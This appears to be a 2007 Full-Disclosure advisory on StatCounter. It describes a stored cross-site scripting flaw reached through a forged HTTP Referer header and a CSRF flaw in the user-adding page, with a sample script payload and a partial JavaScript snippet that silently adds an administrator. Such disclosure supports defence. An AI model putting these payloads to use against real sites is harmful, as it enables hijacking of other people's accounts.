1. DESCRIPTION OF THE SOFTWARE StatCounter.com is a free yet reliable invisible web tracker, highly configurable hit counter as well as a real-time detailed web stats tool. Insert a simple piece of our code on your web page or blog and you will be able to analyse and monitor all the visitors to your website in real-time! [from statcounter.com]
2. DESCRIPTION OF THE VULNERABILITY The referrer field is taken from the HTTP header generated by the user with his browser. So it's a user-input and it is therefore possibile to tamper with it. This is a snip of the code taken from the section "Came From" of the statistics page on statcounter.com ... <img src="http://www.statcounter.com/images/drill_down.gif" alt="drill down" border="0"></a></td><td class="tableContent1Right">1</td><td class="tableContent1Left"><a href="http://www.google.it/?q=stat+counter" target="_blank">www.google.it/?q=stat+counter</a></td></tr> ... If an attacker creates an HTTP request with this header, an alert box will be displayed when the blogger reads his stats: Referer:http://www.domain.it"></a><script>alert("XSS")</script><a href=" On the stats page this HTML code will be written: ... <img src="http://www.statcounter.com/images/drill_down.gif" alt="drill down" border="0"></a></td><td class="tableContent1Right">1</td><td class="tableContent1Left"><a href="http://www.domain.it"></a><script>alert("XSS")</script><a href="" target="_blank">http://www.domain.it"></a><script>alert("XSS")</script><a href="</a></td></tr> ... 3. ANALYSIS An attacker could forge the HTTP Referrer so to inject inside it some Javascript code aiming to create a persistent Cross-Site Scripting (XSS). In order to exploit this vulnerability, an attacker can simply request a page controlled by the StatCounter script and send a specially crafted HTTP header. Besides the XSS bug, there is also another one: in the "user" page on the personal account area it is possbile to add a new user to the statistics page. The page that receives the parameters (/user/add.php) does not use any validation code for preventing CSRF (Cross-Site Request Forgery). So, in this case, is it possible to create a CSRF with a simple piece of JS code injected into the referer HTTP header like this: <SCRIPT> var img = new Image(); img.src = 'http://'+document.domain+'/users/add.php?postback=1&username=MyUserName&etc...'; //this is not all parameters needed </SCRIPT> Note that the original form method is POST but the PHP page retrieves the parameter with a $_REQUEST method and the"document.domain" is necessary because Stat Counter uses a different Web server for load balancing. In this way an attacker can, silently, add himself/herself, with administrative privileges, to statistics panel of a compromised account and he/she can execute some JavaScript code. No user interaction is needed. 4. IMPACT The impact of this vulnerability is HIGH for integrity of Stat Counter customer account. 5. TIME LINE 05/07/2007 - Vendor contacted 16/07/2007 - Vendor solved XSS bug 17/07/2007 - Vendor working on CSRF bug 23/07/2007 - PUBLIC DISCLOSURE -- Matteo Carli [EMAIL PROTECTED] | web: www.matteocarli.com GPG keyID: 0xD20BA70A | GnuPG key server: pgp.mit.edu _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/